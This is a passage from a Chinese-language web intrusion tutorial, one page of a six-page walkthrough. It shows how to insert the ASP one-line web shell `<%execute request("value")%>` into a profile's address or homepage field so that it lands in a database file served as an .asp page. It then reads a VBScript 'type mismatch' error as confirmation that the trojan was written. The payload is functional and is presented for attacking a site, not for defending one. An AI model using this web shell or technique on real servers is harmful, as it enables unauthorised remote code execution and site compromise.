我们在地址或个人主页那里写上一句话代码
<%execute request("value")%>  图3



自我介绍那里我试了.只要写了代码就被转义了,,

然后我们重新看下数据库文件
http://www.xxx.com/system/xxxx/system.asp
看最下面的数据..图4



Microsoft VBScript 运行时错误 错误 '800a000d'

类型不匹配: 'execute'

/system/xxxx/system.asp，行838

说明我们已经成功把一句话木马代码写进数据库

上一页  [1] [2] [3] [4] [5] [6] 下一页